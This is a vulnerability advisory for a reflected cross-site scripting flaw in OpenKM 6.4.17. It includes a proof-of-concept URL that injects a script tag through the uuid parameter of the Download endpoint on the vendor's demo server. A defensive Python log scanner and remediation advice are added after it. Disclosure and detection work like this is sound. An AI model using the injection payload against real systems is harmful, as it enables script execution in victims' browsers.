OpenKM Document Management System 6.4.17 Cross Site Scripting

2014.11.18
Credit: khalil
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

OpenKM Document Management System suffers from a cross-site scripting vulnerability.

Image: http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabilities/openkm.jpg

Version: <=6.4.17
Software test: http://demo.openkm.com/OpenKM/login.jsp
Author: Khalil Shreateh <https://www.facebook.com/khalil.shr>
Author website: http://khalil-shreateh.com
Status: Reported
Report link: http://issues.openkm.com/view.php?id=3056

Attack description:
Log in with any user, then navigate to:
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealert%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E

PoC image: http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabilities/xss.jpg
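An added example, not part of the original advisory or of OpenKM's code: a Python check that scans web access logs for requests to the Download endpoint described above whose uuid parameter is not a well-formed UUID. The combined log format, the canonical-UUID shape of legitimate values and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory.
ENDPOINT = "/OpenKM/frontend/Download"
PARAM = "uuid"

# Assumption: legitimate uuid values are canonical 36-character UUIDs.
UUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - alice [18/Nov/2014:10:00:01 +0100] "GET /OpenKM/frontend/'
    'Download?export&uuid=0b1c2d3e-4f50-4a6b-8c7d-9e0f1a2b3c4d HTTP/1.1" 200 5120',
    '203.0.113.7 - bob [18/Nov/2014:10:02:13 +0100] "GET /OpenKM/frontend/'
    'Download?export&uuid=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 312',
    '192.0.2.10 - alice [18/Nov/2014:10:03:40 +0100] "GET /OpenKM/login.jsp '
    'HTTP/1.1" 200 2048',
]


def suspicious_uuid(line):
    """Return the decoded uuid value when a Download request carries a uuid
    that is not a well-formed UUID; return None otherwise."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path != ENDPOINT:
        return None
    # parse_qs percent-decodes values; the bare "export" key is kept as blank.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get(PARAM, []):
        # fullmatch rejects trailing data such as an encoded newline.
        if not UUID_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_uuid(line)) is not None]


if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(f"line {n}: malformed uuid {v!r}")
```

The same well-formedness test, applied server-side before the value is used, together with HTML-encoding of anything echoed into the response, closes the reflection described in the advisory.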


Copyright 2024, cxsecurity.com

 
